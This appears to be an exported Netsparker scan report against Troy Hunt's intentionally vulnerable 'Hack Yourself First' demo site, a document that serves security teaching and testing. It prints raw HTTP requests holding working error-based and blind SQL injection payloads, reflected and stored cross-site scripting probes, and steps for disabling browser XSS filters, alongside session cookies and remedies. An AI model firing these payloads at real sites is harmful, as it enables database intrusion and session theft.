Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)   at System.Data.SqlClient.SqlInternalConnecti…
2.4 /Make/3 CONFIRMED
http://hackyourselffirst.troyhunt.com/Make/3?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Parameters
Parameter | Type | Value
orderby | GET | (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
Extracted Data
microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
Request
GET /Make/3?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)   at System.Data.SqlClient.SqlInternalConnecti…
2.5 /Make/1 CONFIRMED
http://hackyourselffirst.troyhunt.com/Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Parameters
Parameter | Type | Value
orderby | GET | (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
Extracted Data
microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
Request
GET /Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)   at System.Data.SqlClient.SqlInternalConnecti…
1 TOTAL | IMPORTANT | 1 CONFIRMED

3. Cross-site Scripting
Netsparker detected cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of cross-site scripting, including:
- Hijacking a user's active session
- Mounting phishing attacks
- Intercepting data and performing man-in-the-middle attacks
Remedy
The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the output location and context. For example, if the output goes into a JavaScript block within the HTML document, then the output needs to be encoded accordingly. Encoding can get very complex, therefore it's strongly recommended to use an encoding library such as OWASP ESAPI and Microsoft Anti-cross-site scripting.
Remedy References
- Microsoft Anti-XSS Library
- OWASP XSS Prevention Cheat Sheet
- OWASP AntiSamy Java
External References
- XSS Cheat Sheet
- OWASP - cross-site scripting
- XSS Shell
- XSS Tunnelling
Proof of Concept Notes
The generated XSS exploit might not work due to browser XSS filtering. Please follow the guidelines below in order to disable XSS filtering for different browsers. Also note that XSS filtering is a feature that's enabled by default in some modern browsers. It should only be disabled temporarily to test exploits and should be reverted if the browser is actively used for anything other than testing purposes. Even though browsers have certain checks to prevent cross-site scripting attacks, in practice there are a variety of ways to bypass this mechanism; therefore a web application should not rely on this kind of client-side browser check.
Chrome
Open a command prompt. Go to the folder where chrome.exe is located. Run the command: chrome.exe --args --disable-xss-auditor
Internet Explorer
Click Tools -> Internet Options and then navigate to the Security tab. Click Custom level and scroll towards the bottom, where you will find that Enable XSS filter is currently Enabled. Set it to Disabled. Click OK. Click Yes to accept the warning, followed by Apply.
Firefox
Go to about:config in the URL address bar. In the search field type urlbar.filter and find browser.urlbar.filter.javascript. Set its value to false by double clicking the row.
Classification
OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
3.1 /Search CONFIRMED
http://hackyourselffirst.troyhunt.com/Search?searchTerm=%2Bnetsparker(9)%2B

Parameters
Parameter | Type | Value
searchTerm | GET | +netsparker(9)+

Request
GET /Search?searchTerm=%2Bnetsparker(9)%2B HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response
…</section></div></div></div></div></header>
<div class="container"><section>
<h2>You searched for &quot;<span id="searchTerm">+netsparker(9)+</span>&quot;</h2>
<p class="alert alert-error">No results found for your search.</p>
</section><hr><footer><p>&copy; 2014 - Hack Yourself First</p></footer>
…></script>
<script>$('#results tr').click(function () { var url = '/Supercar/' + $(this).attr('id'); window.location.href = url; });
$('#searchTerm').val(+netsparker(9)+);</script>
<script>(function (i, s, o, g, r, a, m) { i['GoogleAnalyticsObject'] = r; i[r] = i[r] || function () { (i[r].q = i[r].q || []).push(arguments) }, i[r…
IMPORTANT: 1 total, 1 confirmed
4. Permanent Cross-site Scripting
Netsparker identified permanent cross-site scripting and confirmed this vulnerability by analyzing the execution of injected JavaScript.

Permanent XSS allows an attacker to execute dynamic scripts (JavaScript, VBScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by the user has been interpreted by HTML/JavaScript/VBScript within the browser.

Permanent means that the attack will be stored in the backend system. In normal XSS attacks an attacker needs to e-mail the victim, but in a permanent XSS an attacker can just execute the attack and wait for users to see the affected page. As soon as someone visits the page, the attacker's stored payload will get executed.

XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' sessions, the attacker might attack an administrator to gain full control over the application.

Impact
Permanent XSS is a dangerous issue that has many exploitation vectors, some of which include:
- Users' session-sensitive information, such as cookies, can be stolen.
- XSS can enable client-side worms, which could modify, delete or steal other users' data within the application.
- The website can be redirected to a new location, defaced or used as a phishing site.

Remedy
The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML, ensure all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a whitelist. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured whitelist libraries available for many different environments; good examples of these include the OWASP Reform and Microsoft Anti-cross-site scripting libraries.

Remedy References: [ASP.NET] - Microsoft Anti-XSS Library; OWASP XSS Prevention Cheat Sheet; OWASP AntiSamy Java
External References: XSS Cheat Sheet; OWASP - Cross-site Scripting; XSS Shell; XSS Tunnelling
Classification: OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
4.1 /Supercar/3 CONFIRMED
http://hackyourselffirst.troyhunt.com/Supercar/3

Injection URL: http://hackyourselffirst.troyhunt.com/api/vote
Injection Request
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 77
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=%22%3E%3Cnet+sparker%3Dnetsparker(0x00043F)%3E

Identification Request
GET /Supercar/3 HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Injection Response
HTTP/1.1 201 Created
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:53 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 0
Expires: -1

Identification Response
…1)) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)),1,1)),0)=1</td></tr><tr><td>Troy Hunt</td><td>"><net sparker=netsparker(0x00043F)></td></tr><tr><td>Troy Hunt</td><td>-1 OR 1=1) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)…
IMPORTANT: 1 total, 1 confirmed
5. Password Transmitted over HTTP
Netsparker detected that password data is being transmitted over HTTP.

Impact
If an attacker can intercept network traffic, he/she can steal users' credentials.

Actions to Take
1. See the remedy for solution.
2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.

Classification: OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-319, CAPEC-65, WASC-04
5.1 /Account/Register CONFIRMED
http://hackyourselffirst.troyhunt.com/Account/Register

Form target action: http://hackyourselffirst.troyhunt.com/Account/Register

Request
GET /Account/Register HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2265
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Register - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet">
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
IMPORTANT: 1 total, 1 confirmed
6. Cookie Not Marked as Secure
Netsparker identified a cookie not marked as secure, and transmitted over HTTPS.

This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic, or following a successful man-in-the-middle attack.

Impact
This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie), an attacker might intercept it and hijack a victim's session. If the attacker can carry out a man-in-the-middle attack, he/she can force the victim to make an HTTP request to steal the cookie.

Actions to Take
1. See the remedy for solution.
2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information, you do not have to mark it as secure.)

Remedy
Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation
To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or to the victim's network. Attackers need to understand layer 2, have physical access to systems either as waypoints for the traffic, or have locally gained access to a system between the victim and the web server.

External References: .NET Cookie.Secure Property; How to Create Totally Secure Cookies
Classification: OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-614, CAPEC-102, WASC-15
6.1 /Account/Login CONFIRMED
https://hackyourselffirst.troyhunt.com/Account/Login

Identified Cookie: AuthCookie

Request
POST /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/Account/Login
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 57
Content-Type: application/x-www-form-urlencoded

Email=netsparker%40example.com&Password=3&RememberMe=true

Response
HTTP/1.1 302 Found
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:00 GMT
Location: http://hackyourselffirst.troyhunt.com/
Server: Microsoft-IIS/8.0
Set-Cookie: AuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
Set-Cookie: Password=Mw==; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
Set-Cookie: Email=netsparker@example.com; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 155
Content-Type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://hackyourselffirst.troyhunt.com/">here</a>.</h2>
</body></html>
IMPORTANT: 1 total

7. Out-of-date Version (Microsoft SQL Server)
Netsparker identified you are using an out-of-date version of Microsoft SQL Server.

Impact
Since this is an old version of the software, it may be vulnerable to attacks.

Remedy
Please upgrade your installation of Microsoft SQL Server to the latest stable version.

Classification: OWASP 2010-A6, OWASP 2013-A9, PCI V2.0-6.1, PCI V3.0-6.1, CAPEC-310
7.1 /Make/1
http://hackyourselffirst.troyhunt.com/Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA

Identified Version: 11.0.9222.17
Latest Version: 12.0.2000.0
Vulnerability Database: Result is based on 18/08/2014 vulnerability database content.
Certainty

Request
GET /Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:55 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px} b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px} H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red } H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon } pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt} .marker {font-weight: bold; color: black;text-decoration: none;} .version {color: gray;} .error {margin-bottom: 10px;} .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; } @media screen and (max-width: 639px) { pre { width: 440px; overflow: auto; white-space: pre-wrap; word-wrap: break-word; } } @media screen and (max-width: 479px) { pre { width: 280px; } } </style></head>
<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please revie…
MEDIUM: 1 total, 1 confirmed

8. Critical Form Served over HTTP
Netsparker detected that a critical form is served over HTTP.

Impact
If an attacker can carry out a man-in-the-middle attack, he/she may be able to intercept traffic by injecting JavaScript code into this page or changing the action of the HTTP code to steal the user's password. Even though the target page is HTTPS, this does not protect the system against man-in-the-middle attacks.

This issue is important as it negates the use of SSL as a privacy protection barrier.

Actions to Take
1. See the remedy for solution.
2. Move all of your critical forms to HTTPS and do not allow these pages to be served over HTTP.

Remedy
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.

Classification: OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-319, CAPEC-65, WASC-04
8.1 /Account/Login CONFIRMED
http://hackyourselffirst.troyhunt.com/Account/Login

Form target action: https://hackyourselffirst.troyhunt.com/Account/Login

Request
GET /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
